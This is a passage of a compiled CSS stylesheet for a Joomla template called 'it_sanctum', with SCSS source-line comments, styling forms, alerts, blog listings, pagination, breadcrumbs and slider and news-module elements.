.remind #user-registration, .reset #user-registration {
  margin-bottom: 0;
}
/* line 160, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 161, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration fieldset p, .reset #user-registration fieldset p {
  margin-top: 0;
}
/* line 165, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration .control-group .control-label, .reset #user-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 175, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 176, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile > ul.btn-toolbar {
  margin-top: 0;
}
/* line 179, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile #users-profile-core {
  margin-bottom: 20px;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile fieldset dl dt {
  text-align: left;
}
/* line 192, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile {
  margin-bottom: 0;
}
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 196, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .chzn-container {
  padding-top: 8px;
}
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped, .row-striped {
  border-top: 1px solid #ddd;
}
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li, .list-striped dd, .row-striped .row, .row-striped .row-fluid {
  border-bottom: 1px solid #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:nth-child(odd), .list-striped dd:nth-child(odd), .row-striped .row:nth-child(odd), .row-striped .row-fluid:nth-child(odd) {
  background-color: #fcfcfc;
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:hover, .list-striped dd:hover, .row-striped .row:hover, .row-striped .row-fluid:hover {
  background-color: #f2f2f2;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-bordered, .row-bordered {
  border: 1px solid #ddd;
}
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even, .row-odd {
  border-bottom: 1px solid #ddd;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even {
  background-color: #fcfcfc;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.iframe-bordered {
  border: 1px solid #ddd;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote {
  border-left: 5px solid #ddd;
}
/* line 52, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote small {
  color: #c8c8c8;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote.pull-right {
  border-right: 5px solid #ddd;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend {
  color: #333;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend small {
  color: #999;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-single, .input-append .chzn-container-single .chzn-single {
  border-color: #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-drop, .input-append .chzn-container-single .chzn-drop {
  border-color: #ddd;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
  background-color: #fff;
  border: 1px solid #d5d5d5;
  box-shadow: none;
  padding: 10px;
  border-radius: 0;
  -webkit-transition: border 0.2s linear, box-shadow 0.2s linear;
  -moz-transition: border 0.2s linear, box-shadow 0.2s linear;
  transition: border 0.2s linear, box-shadow 0.2s linear;
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus {
  box-shadow: none;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input, #g-sidebar input, #g-offcanvas input, #g-aside textarea, #g-sidebar textarea, #g-offcanvas textarea, #g-aside .uneditable-input, #g-sidebar .uneditable-input, #g-offcanvas .uneditable-input {
  width: 100%;
}
/* line 50, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input[type="file"], #g-sidebar input[type="file"], #g-offcanvas input[type="file"], #g-aside input[type="image"], #g-sidebar input[type="image"], #g-offcanvas input[type="image"], #g-aside input[type="submit"], #g-sidebar input[type="submit"], #g-offcanvas input[type="submit"], #g-aside input[type="reset"], #g-sidebar input[type="reset"], #g-offcanvas input[type="reset"], #g-aside input[type="button"], #g-sidebar input[type="button"], #g-offcanvas input[type="button"], #g-aside input[type="radio"], #g-sidebar input[type="radio"], #g-offcanvas input[type="radio"], #g-aside input[type="checkbox"], #g-sidebar input[type="checkbox"], #g-offcanvas input[type="checkbox"] {
  width: auto;
}
/* line 55, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search form, #g-navigation .search form {
  margin-bottom: 0;
}
/* line 60, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search input, #g-navigation .search input {
  margin-bottom: 0;
  border: 0;
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 69, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.view-mailto #g-page-surround, .body-only #g-page-surround {
  box-shadow: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark {
  border-bottom: 1px solid #333;
  text-shadow: 1px 1px 1px #000;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a {
  color: #f8f8f8;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a:hover {
  border-color: #333 #333 #111;
  background-color: #777;
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > .active > a, .nav-tabs.nav-dark > .active > a:hover {
  color: #fff;
  background-color: #555;
  border: 1px solid #222;
}
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.tip-wrap {
  color: #fff;
  background-color: #000;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.search span.highlight {
  background-color: #fcfcfc;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.img-polaroid {
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.2);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.muted {
  color: #999;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.muted:hover, a.muted:focus {
  color: #808080;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert {
  background-color: #f8f4ec;
  border-color: #eee4d2;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a, .alert a:hover, .alert .alert-link, .alert .alert-link:hover {
  color: #a47e3c;
  font-weight: bold;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a:hover, .alert a:hover:hover, .alert .alert-link:hover, .alert .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert, .text-warning {
  color: #c09853;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert h4 {
  color: #c09853 !important;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-warning:hover, a.text-warning:focus {
  color: #b78c43;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success {
  color: #468847;
  background-color: #dfeedf;
  border-color: #c4e0c4;
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a, .alert-success a:hover, .alert-success .alert-link, .alert-success .alert-link:hover {
  color: #356635;
  font-weight: bold;
}
/* line 67, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a:hover, .alert-success a:hover:hover, .alert-success .alert-link:hover, .alert-success .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 73, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-success {
  color: #468847;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success h4 {
  color: #468847 !important;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-success:hover, a.text-success:focus {
  color: #3d773e;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger, .alert-error {
  color: #b94a48;
  background-color: #f6e7e7;
  border-color: #edd1d0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a, .alert-error a, .alert-danger a:hover, .alert-error a:hover, .alert-danger .alert-link, .alert-error .alert-link, .alert-danger .alert-link:hover, .alert-error .alert-link:hover {
  color: #953b39;
  font-weight: bold;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a:hover, .alert-error a:hover, .alert-danger a:hover:hover, .alert-error a:hover:hover, .alert-danger .alert-link:hover, .alert-error .alert-link:hover, .alert-danger .alert-link:hover:hover, .alert-error .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-error {
  color: #b94a48;
}
/* line 106, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger h4, .alert-error h4 {
  color: #b94a48 !important;
}
/* line 111, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-error:hover, a.text-error:focus {
  color: #a74240;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info {
  color: #3a87ad;
  background-color: #e2eff5;
  border-color: #c7e0ec;
}
/* line 121, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a, .alert-info a:hover, .alert-info .alert-link, .alert-info .alert-link:hover {
  color: #2d6987;
  font-weight: bold;
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a:hover, .alert-info a:hover:hover, .alert-info .alert-link:hover, .alert-info .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-info {
  color: #3a87ad;
}
/* line 135, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info h4 {
  color: #3a87ad !important;
}
/* line 139, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-info:hover, a.text-info:focus {
  color: #34789a;
}
/* line 145, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.platform-content input {
  box-sizing: inherit;
}
/* line 150, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.form-actions {
  background-color: transparent;
  border: none;
  margin: 0;
  padding: 0;
}
/* line 158, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact > h3 {
  display: none;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact .contact-address {
  margin: 0;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form fieldset > legend {
  font-size: 0.9rem;
  color: #282828;
  margin-bottom: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.form-horizontal .control-label {
  text-align: left;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form input, .contact #contact-form textarea {
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy {
  width: 10px;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form label {
  margin-top: 3px;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy-lbl {
  margin-top: 0;
}
/* line 40, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .contact #contact-form .form-actions {
    padding: 0;
  }
  /* line 43, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
  .contact #contact-form .form-actions > button {
    display: block;
    width: 100%;
  }
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.well {
  border: none;
  padding: 0;
  background: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb {
  margin: 6px 0 0;
  padding: 0;
  background: none;
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  ul.breadcrumb {
    margin: 0;
  }
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li {
  text-shadow: none;
}
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li .divider {
  display: none;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:after {
  content: "/ ";
  padding: 0 5px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:last-child:after {
  content: none;
  padding: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:last-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:first-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .category-desc, .blog-featured .category-desc {
  margin: -10px 0 30px;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .items-more ol, .blog-featured .items-more ol {
  padding-left: 0;
  margin: 0 0 60px 0;
}
/* line 12, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog article.item, .blog-featured article.item {
  margin-bottom: 60px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.item-page ul.pager {
  margin-bottom: 0;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
article .item-image {
  margin: 20px 0;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 {
  margin: 10px 0;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a {
  color: #282828;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a:hover {
  color: #4f953b;
}
/* line 43, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category form {
  margin-bottom: 0;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header {
  position: relative;
  padding: 0;
}
/* line 51, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons {
  position: relative;
  right: 0;
  top: 32px;
  right: 15px;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn {
  background: transparent !important;
  border: 0px solid #fff !important;
  padding: 0.3rem 0.6rem !important;
}
/* line 61, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
  color: #959595 !important;
  margin-right: 0px;
}
@media only all and (max-width: 47.938rem) {
  .g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
    margin-top: 5px;
  }
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn .caret {
  display: none;
}
/* line 71, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn:hover {
  color: #4f953b !important;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 78, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 {
  margin: 0 0 -10px 0;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a {
  color: #282828;
}
/* line 82, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a:hover {
  color: #4f953b;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore {
  margin: 0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore .btn span {
  display: none;
}
/* line 99, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tags {
  margin-bottom: 1.5rem;
}
/* line 103, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info {
  color: #959595;
  margin: 20px 0 0;
  background: transparent;
  border: 1px solid #ddd;
  padding: 1rem 1.5rem;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info a {
  color: #959595;
}
/* line 112, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info .article-info-term {
  display: none;
}
/* line 115, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd {
  display: inline-block;
  margin: 0 20px 0 0;
}
/* line 118, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd i {
  margin-right: 5px;
}
@media only all and (max-width: 47.938rem) {
  .article-info {
    text-align: center;
  }
}
/* line 127, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 128, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category form {
  margin-bottom: 0;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination {
  margin-bottom: 0;
}
/* line 133, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination > ul {
  margin-bottom: 0;
  box-shadow: none;
}
/* line 137, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination .counter {
  margin-bottom: 0;
}
@media only all and (max-width: 47.938rem) {
  .content-category .pagination .counter {
    float: none;
  }
}
/* line 146, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination {
  margin: 0;
}
/* line 148, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul {
  margin: 0;
  box-shadow: none;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 152, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a, .pagination ul > li > span {
  color: inherit;
  padding: 0.675rem 1rem;
  margin-right: 5px;
  border: 1px solid #ddd;
  border-radius: 0px !important;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 159, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a:hover, .pagination ul > li > span:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > .active > a, .pagination ul > .active > span {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 174, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination .counter {
  margin: 7px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .pagination .counter {
    float: none;
  }
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a {
  color: inherit;
  border: 1px solid inherit;
  background: transparent;
  border-radius: 0px;
  padding: 0.675rem 1.5rem;
}
/* line 190, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button {
  color: #fff;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button.dark {
  margin-left: 10px;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:before {
  color: #fff;
  display: inline-block;
  font-family: FontAwesome, sans-serif;
  font-size: 20px;
  font-style: normal;
  font-weight: bold;
  margin-right: 0;
  margin-top: 2px;
  text-align: center;
  text-decoration: inherit;
  width: 35px;
}
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows {
  background: #000;
  background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
  border-radius: 5px;
  cursor: pointer;
  height: 35px;
  width: 35px;
  -webkit-transition: background 0.3s, opacity 0.3s;
  -moz-transition: background 0.3s, opacity 0.3s;
  transition: background 0.3s, opacity 0.3s;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  color: #fff;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-leftarrow:before {
  content: "\f104";
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-rightarrow:before {
  content: "\f105";
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows.tp-rightarrow:before {
  margin-left: 1px;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  background: #000;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title {
  margin: 0 0 10px;
  font-size: 1.035rem;
  font-weight: normal;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a {
  color: #282828;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a:hover {
  color: #4f953b;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-introtext {
  margin: 0;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-social span {
  margin-left: 0 !important;
  margin-right: 10px;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-rating {
  margin-bottom: 10px;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links {
  margin-top: 10px;
  font-size: 0.81rem;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created {
  margin-right: 15px;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created:before {
  content: "\f017";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 36, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author {
  margin-right: 15px;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author:before {
  content: "\f007";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category {
  margin-right: 15px;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a {
  color: #959595;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:before {
  content: "\f07c";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:hover {
  color: #4f953b;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments {
  margin: 0;
  margin-right: 15px;
  color: #959595;
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:before {
  content: "\f086";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 70, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:hover {
  color: #4f953b;
}
/* line 74, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits {
  margin-right: 15px;
  background: none;
  padding: 0;
  color: #959595;
  font-size: inherit;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits:before {
  content: "\f06e";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore {
  margin: 0;
  margin-right: 15px;
  color: #959595;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore span {
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 95, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:before {
  content: "\f0c1";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 100, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:hover {
  color: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom {
  overflow: hidden;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div {
  margin-bottom: 30px;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div:last-child {
  margin-bottom: 0;
}
